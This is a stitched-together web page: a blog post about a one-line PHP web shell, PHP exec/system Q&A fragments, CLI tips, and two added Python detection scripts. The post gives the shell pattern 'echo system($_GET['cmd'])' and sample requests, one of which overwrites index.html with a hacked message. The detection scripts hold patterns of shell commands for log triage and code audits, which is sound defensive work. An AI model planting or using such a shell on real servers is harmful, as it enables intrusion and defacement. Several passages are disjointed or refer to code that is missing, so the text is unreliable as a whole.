One-line PHP script for getting a shell.
I heard someone mention a one-line PHP script that is essentially a shell. I assumed that writing such a script would not be particularly hard, since it is only a single line. Searching Google did not turn up much, perhaps because it is too easy or because I used the wrong search terms. In any case, I forgot about the script for a while. Until now.
Since I am currently learning PHP, I am interested in web application security.
I have not finished learning yet, but today (while reading about how to handle input data before using “include”) I remembered the one-line PHP script.
Here is what I came up with:
Obviously, the web application has to be vulnerable in some way for it to be possible to place this script on the server. Once a vulnerability is found, the script can potentially be used to hack the site or to create a dump of it.
The script's output is plain text, not an HTML document. So if you use a web browser, you need to view the page source to see the result.
I used shell_exec() rather than just exec() because it returns every line instead of only the last one. An alternative is passthru(), which will also send binary data. But to receive binary data and handle it correctly, you would also have to set headers, which makes the script multi-line.
I was able to run Unix commands (Windows commands should also work if the host runs Windows) such as:
- shell.php?e=whoami
- shell.php?e=pwd
- shell.php?e=uname%20-a (I had to URL encode the spaces otherwise my browser thought it should search using google)
- shell.php?e=echo%20This%20site%20has%20been%20hacked%3Eindex.html
- shell?e=ls%20-l%20/tmp
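Seen from the detection side, the requests listed above leave a clear trace in the web-server access log. The following Python triage pass is an added example, not part of the original post: it URL-decodes every query parameter and flags values that look like shell commands. The log lines are constructed, and the command list is seeded only from the commands named in the list.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Combined Log Format: only client IP, request line and status are needed.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

# Triage heuristic: a value that starts with one of the commands from the
# list above, or contains shell metacharacters / output redirection.
# Extend the command set for your own environment.
CMD_RE = re.compile(
    r'^\s*(whoami|pwd|uname|echo|ls)\b'
    r'|[;|`]|\$\(|>\s*\S+')

def decode(value, rounds=2):
    """Undo nested URL encoding (e.g. %2520) before matching."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_requests(lines):
    """Yield (ip, path, param, decoded_value, status) for command-like values."""
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, _method, target, status = m.groups()
        url = urlsplit(target)
        # parse_qsl decodes once; decode() peels any further layers.
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            value = decode(value)
            if CMD_RE.search(value):
                yield ip, url.path, name, value, int(status)

SAMPLE_LOG = [  # constructed lines using documentation IP ranges
    '203.0.113.7 - - [10/Mar/2024:10:00:01 +0000] "GET /shell.php?e=whoami HTTP/1.1" 200 9',
    '203.0.113.7 - - [10/Mar/2024:10:00:05 +0000] "GET /shell.php?e=uname%20-a HTTP/1.1" 200 98',
    '203.0.113.7 - - [10/Mar/2024:10:00:09 +0000] "GET /shell.php?e=echo%20x%3Eindex.html HTTP/1.1" 200 0',
    '198.51.100.4 - - [10/Mar/2024:10:01:00 +0000] "GET /search.php?q=php+shell_exec+manual HTTP/1.1" 200 512',
    '198.51.100.9 - - [10/Mar/2024:10:02:00 +0000] "GET /up.php?c=ls%2520-l%2520/tmp HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_LOG):
        print(hit)
```

The status code is kept in each hit because a 200 on a command-like request deserves attention before a 404 does.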
System Command Execution through PHP Echo with $_GET Variable
To use PHP from the command line on Windows with the CLI version, replace "php" with "php.exe". Remember to include a semicolon at the end of the line to avoid a syntax error. To execute code from the command line, there are two switches available using the "php" command. The "-r" switch can be used to output and return results, as demonstrated above. Another option is to use the "php -a" switch, which is not as advanced as phpsh but still useful for those who do not want to install an interactive shell for PHP with features like tab completion and history.
PHP echo system($_GET['cmd'])
php execute command and display output
They have slightly different purposes:
1. exec() is for calling a system command, and perhaps dealing with the output yourself.
2. system() is for executing a system command and immediately displaying the output - presumably text.
3. passthru() is for executing a system command which you wish the raw return from - presumably something binary.
Regardless, I suggest you not use any of them. They all produce highly unportable code.
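When auditing a PHP code base, these are the calls to search for. The following Python scanner is an added example, not from the answer above: it flags exec-family calls whose arguments come from request superglobals, either directly or through one assignment. The PHP sample is constructed, and popen/proc_open are added here to the functions the answer names.

```python
import re

# Functions compared above, plus popen/proc_open (added for this example).
EXEC_FUNCS = ("shell_exec", "exec", "system", "passthru", "popen", "proc_open")
SUPERGLOBAL = r'\$_(?:GET|POST|REQUEST|COOKIE)\b'

# PHP function names are case-insensitive; the lookbehind skips methods
# (->exec), variables ($exec) and longer names such as curl_exec().
CALL_RE = re.compile(r'(?<![\w>$:])(' + "|".join(EXEC_FUNCS) + r')\s*\(([^;]*)', re.I)
# One-hop taint: "$var = ... $_GET[...] ...;" (also ".=", but not "==").
ASSIGN_RE = re.compile(r'(\$\w+)\s*\.?=(?!=)\s*([^;]*' + SUPERGLOBAL + r'[^;]*)')
ESCAPED_RE = re.compile(r'escapeshell(?:arg|cmd)\s*\(', re.I)

def scan_php(source):
    """Return [(line, function, reason)] for exec-family calls fed by request data."""
    # Map each tainted variable to whether its assignment applied escaping.
    tainted = {var: bool(ESCAPED_RE.search(rhs))
               for var, rhs in ASSIGN_RE.findall(source)}
    findings = []
    for m in CALL_RE.finditer(source):
        func, args = m.group(1).lower(), m.group(2)
        escaped = bool(ESCAPED_RE.search(args))
        if re.search(SUPERGLOBAL, args):
            reason = "request data passed directly"
        else:
            used = [v for v in re.findall(r'\$\w+', args) if v in tainted]
            if not used:
                continue  # no request-derived variable in this call
            reason = "request data via " + used[0]
            escaped = escaped or tainted[used[0]]
        if escaped:
            reason += " (escaped, review manually)"
        findings.append((source.count("\n", 0, m.start()) + 1, func, reason))
    return findings

# Constructed sample source, not taken from the page.
SAMPLE_PHP = '''<?php
echo system($_GET['cmd']);
$host = $_POST['host'];
$out = shell_exec("ping -c 1 " . $host);
$safe = escapeshellarg($_GET['file']);
passthru("file " . $safe);
$ch = curl_init(); curl_exec($ch);
exec("uptime", $lines);
'''

if __name__ == "__main__":
    for finding in scan_php(SAMPLE_PHP):
        print(finding)
```

This is a regex heuristic for triage: it does not parse PHP, so commented-out code is also reported and taint passed through more than one assignment is missed.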
How to run cmd commands in php (exec/system)
I am attempting to execute cmd commands and systems through PHP code, but I am not receiving any output. Do I need to enable any settings in php.ini for this to work?
The execution of exec() depends on the content that is written inside it. However, it is important to note that this command can only be executed on the server side and not on the client side.
To utilize this command, you can write to check the ping of Google, and the outcome will appear on your browser page. Alternatively, use shell_exec("ping google.com"); to view more details. For instance, shell_exec('systeminfo | findstr /B /C:"OS Name"'); can be used to display your operating system. Another way to use this command is by creating a bat file named "Simple.bat" and saving it on the root of your website. Then, use to call it. If you are facing issues while running IIS, the root cause could be something within your settings. There are numerous causes for this, and as I do not have experience with IIS, I can only suggest that you check out the first reply in this link: https://forums.iis.net/t/1216283.aspx.
How can I execute PHP code from the command line?
I’m interested in running a PHP statement easily through the command line, without the need for a distinct PHP file. This can be done by using if(function_exists("my_func")) echo 'function exists';
For an enjoyable experience while doing PHP in the command line, I suggest installing phpsh. It is a good PHP shell that you can use.
In any case, the php instruction presents a pair of toggles that enable the execution of code through the command line.
-r Run PHP without using script tags
-R Run PHP for every input line
Utilize the -r switch of php to accomplish the following:
php -r 'echo function_exists("foo") ? "yes" : "no";'
The PHP command mentioned previously should generate no as output and 0 as the returned result, as demonstrated.
>>> php -r 'echo function_exists("foo") ? "yes" : "no";'
no
>>> echo $? # print the return value of the previous command
0
An additional amusing toggle that can be utilized is the command: php -a.
-a Run as interactive shell
The tool may not be as impressive as phpsh, but in case you prefer not to install an interactive shell for PHP developed by Facebook which offers features like tab completion and history, you can simply use -a.
>>> php -a
Interactive shell

php > echo function_exists("foo") ? "yes" : "no";
no
php >
In case the program fails to function properly on your system, but it does on mine (I have tested it on Ubuntu and Arch Linux), it is likely that your PHP configuration is either faulty or incomplete. To confirm this, you can execute the following command:
Some recommendations for you to consider checking out are:
Server API => Command Line Interface
In case the CLI SAPI is not accessible through a specific command, it’s possible that it can be provided by another command. You can try using php-cli which may be available as a package or command in your operating system.
In case you notice that your php command is executed through the SAPI (Server API) CLI (command-line interface), you can determine the particular switch that enables code execution in your version/setup by running php -h | grep code. It’s worth noting that this switch has remained unchanged for a long time.
To ensure its functionality on my boxes, here are a few additional instances.
>>> php -r 'echo function_exists("sg_load") ? "yes" : "no";'
no
>>> php -r 'echo function_exists("print_r") ? "yes" : "no";'
yes
It should be noted that an extension may be loaded in the CLI but not in the CGI or Apache SAPI. Additionally, various PHP SAPIs are likely to use different php.ini files, such as /etc/php/cli/php.ini, /etc/php/cgi/php.ini, and /etc/php/apache/php.ini on a Gentoo Linux system. To determine which ini file is being used, utilize php -i | grep ini.
For Windows users utilizing the CLI version alongside -r, it is recommended to opt for " over '.
Correct
Incorrect
PHP Parse error: syntax error, unexpected ''echo' (T_ENCAPSED_AND_WHITESPACE), expecting end of file in Command line code on line 1
Remember to use a semicolon to end the line; otherwise, you will receive a PHP Parse error message, which reads "syntax error, unexpected end of file, expecting ';' or ',' in Command line code on line 1".
The final ";" is a must, but you may or may not use the optional "?>" for closing tag.
php -i | grep sourceguardian
You’ll receive text only when it’s available, otherwise, you’ll get nothing.